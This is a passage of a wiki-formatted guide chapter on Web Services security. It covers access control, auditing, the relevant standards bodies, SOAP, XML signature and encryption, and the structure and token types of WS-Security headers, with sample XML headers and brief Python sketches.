&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
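The three decisions above can be sketched with hypothetical in-memory stores standing in for the back-end user and policy stores; all names and credentials are invented:&lt;br /&gt;

```python
# Hypothetical stores; a real deployment would query a directory
# service or Policy Server instead.
known_users = {"alice": "tok-123"}        # identity -> expected credential
permissions = {"alice": {"getQuote"}}     # identity -> allowed operations

def access_decision(identity, credential, operation):
    if identity not in known_users:            # Identification
        return False
    if known_users[identity] != credential:    # Authentication
        return False
    # Authorization
    return operation in permissions.get(identity, set())

assert access_decision("alice", "tok-123", "getQuote")
assert not access_decision("alice", "tok-123", "transfer")
assert not access_decision("mallory", "tok-123", "getQuote")
```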
&lt;br /&gt;
There is another significant problem here – traditional HTTP firewalls do not help stop attacks against Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and making intelligent decisions about passing SOAP messages to their destination. The reader will need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required by audits, is reconstructing the chain of events that led to a certain problem. Normally, this is achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as an “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as Web Services are concerned, such a level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile: XML-based communication, described by an XML-based grammar called the Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces – consisting of messages, expressed as XML Schema, and operations – to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over the HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the best-known industry group; it owns many Web-related standards and develops them in a Working Group format. Of particular interest to this chapter are the XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
The Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is general rather than strictly Web Service-specific, it is important for this topic because of its close relation to the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of the software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, which join them to work on a particular issue or proposal. Results of these joint activities, once they reach a certain maturity, are often submitted to standards committees as the basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
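A minimal SOAP 1.1 Envelope with the Header/Body layout just described can be assembled with nothing more than a generic XML library; the GetQuote operation and its urn:example namespace are invented for illustration:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"   # SOAP 1.1 namespace
ET.register_namespace("soap", SOAP_NS)

# Envelope containing the standard Header and Body elements.
envelope = ET.Element(f"{{{SOAP_NS}}}Envelope")
ET.SubElement(envelope, f"{{{SOAP_NS}}}Header")
body = ET.SubElement(envelope, f"{{{SOAP_NS}}}Body")

# A Document-style operation inside the Body (made-up name/namespace).
op = ET.SubElement(body, "{urn:example:stock}GetQuote")
ET.SubElement(op, "symbol").text = "ACME"

xml_text = ET.tostring(envelope, encoding="unicode")
assert "Envelope" in xml_text and "GetQuote" in xml_text
```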
&lt;br /&gt;
The SOAP protocol, while defining the communication framework, provides no help in securing message exchanges – communications must either happen over secure channels, or use the protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212/&amp;lt;/u&amp;gt;), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity and message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications currently being developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with input from Verisign, RSA Security, and other participants, developed a family of specifications collectively known as the “Web Services Roadmap”. Its foundation, WS-Security, was submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still in various stages of development, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust and security token exchange (WS-Trust), and establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
The WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed the Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchanges. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. The current version is 1.0, and work on version 1.1 of the specification is under way, expected to finish in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
The flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols as they are developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standard are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens passed in WSS messages, and the ways of attaching them to the message, may vary substantially. At a high level, the WSS standard defines three types of security tokens attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of these types is further specified in one (or more) profile documents, which define the additional token attributes and elements needed to represent a particular type of security token. &lt;br /&gt;
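As a structural sketch of the areas listed above, the following Python builds a wsse:Security header carrying a UsernameToken – the simplest of the three token families; the username is made up, and a real implementation would also add the password digest, nonce, and timestamp elements:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
# WSS 1.0 security-extension (wsse) namespace.
WSSE = ("http://docs.oasis-open.org/wss/2004/01/"
        "oasis-200401-wss-wssecurity-secext-1.0.xsd")

envelope = ET.Element(f"{{{SOAP}}}Envelope")
header = ET.SubElement(envelope, f"{{{SOAP}}}Header")

# The wsse:Security header attaches a security token to the message.
security = ET.SubElement(header, f"{{{WSSE}}}Security")
token = ET.SubElement(security, f"{{{WSSE}}}UsernameToken")
ET.SubElement(token, f"{{{WSSE}}}Username").text = "alice"

ET.SubElement(envelope, f"{{{SOAP}}}Body")
wire = ET.tostring(envelope, encoding="unicode")
assert "UsernameToken" in wire
```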
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is to provide tools for message-level communication protection, where each message is an isolated piece of information carrying enough security data to verify all important message properties (authenticity, integrity, freshness) and to initiate decryption of any encrypted message parts. This stands in stark contrast to traditional channel security, which methodically applies a pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data to higher-level protocols. Those protocols, based on standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. Taken alone, however, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard-to-detect problems, as discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents: one core document, which defines how security headers may be included in a SOAP envelope and describes all the high-level blocks that must be present in a valid security header, plus a set of profile documents. The profile documents have the dual task of extending the definitions for the token types they deal with, providing additional attributes and elements, and of defining relationships left out of the core specification, such as the use of attachments.&lt;br /&gt;
&lt;br /&gt;
The core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt;, which specifies how X.509 certificates may be passed in the BinarySecurityToken defined by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WSS-Sec with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
The WSS specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc.; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, Base64 encoding/decoding, which provides a straightforward conversion from binary to ASCII format and back. The example below demonstrates what binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver knows which decoder to apply in order to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
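As an informal illustration (not drawn from the specification), the round trip between raw bytes and their Base64 text form can be sketched in Python; the sample bytes below are arbitrary stand-ins for DER-encoded certificate data:&lt;br /&gt;

```python
import base64

# Arbitrary bytes standing in for binary token data (e.g. a DER certificate).
binary_data = bytes([0x30, 0x82, 0x02, 0xB7, 0xFF, 0x00, 0x10])

encoded = base64.b64encode(binary_data).decode("ascii")  # printable ASCII text
decoded = base64.b64decode(encoded)                      # exact round trip

assert decoded == binary_data
```

The encoded string is safe to embed as element text, which is why WSS carries all binary material this way.&lt;br /&gt;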
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message acts as a sort of envelope around a letter: it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (the SOAP message) should not know, nor care, about its envelope (the WSS Header), since the different units of information carried on the envelope and in the letter are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1) or roles (for SOAP 1.2). Their contents may also refer to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions and signature verifications, and should generally be avoided. The WSS security header itself has a loose structure, as the specification does not require any particular elements to be present; a minimal header in an otherwise empty message looks like this:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
         &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
         &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
    &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
     &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, the header must carry some information that helps secure the message. That means including one or more security tokens (see 0) with references, plus XML Signature and XML Encryption elements if the message is signed and/or encrypted. A typical header therefore looks more like the following: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... &lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;&lt;br /&gt;
         &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  &lt;br /&gt;
 	&amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:ReferenceList&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:ReferenceList&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:EncryptedKey&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
       &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
       &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
       &amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
      &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
       &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;&lt;br /&gt;
 		...&lt;br /&gt;
 	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;&lt;br /&gt;
 		...									&lt;br /&gt;
             &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:Reference&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:SignedInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:KeyInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
         &amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
       &amp;lt;/dsig:Signature&amp;gt;&lt;br /&gt;
     &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
 	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
     &amp;lt;/xenc:EncryptedData&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms for passing a username and, optionally, a password; the latter is described in the username profile document. Unless the whole token is encrypted, a message that includes a clear-text password should always be transmitted over a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with a nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing the password hash: &lt;br /&gt;
&lt;br /&gt;
 Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )&lt;br /&gt;
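The digest formula above can be computed directly; a minimal Python sketch follows (the function name and parameter layout are illustrative, not taken from the profile document), where the nonce is the raw decoded bytes and created/password are UTF-8 text:&lt;br /&gt;

```python
import base64
import hashlib
import os
from datetime import datetime, timezone

def username_token_digest(password: str, nonce: bytes, created: str) -> str:
    # Password_Digest = Base64(SHA-1(nonce + created + password))
    sha1 = hashlib.sha1(nonce + created.encode("utf-8") + password.encode("utf-8"))
    return base64.b64encode(sha1.digest()).decode("ascii")

nonce = os.urandom(16)  # fresh random nonce per message
created = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
digest = username_token_digest("secret", nonce, created)
```

The receiver repeats the same computation with its stored clear-text password and compares the results; the nonce and created values make each digest single-use.&lt;br /&gt;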
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
Binary tokens are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines the BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle the attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;&lt;br /&gt;
         MIICtzCCAi...&lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based token, but primarily for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, the SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
 	&amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure a message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens passed in the message, or to identify signed and encrypted message parts, the core specification adopts a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs be unique within the scope of the XML document where they are defined. Its use has a significant advantage for intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, the XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have closed schemas), so when trying to locate signature or encryption elements, the local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
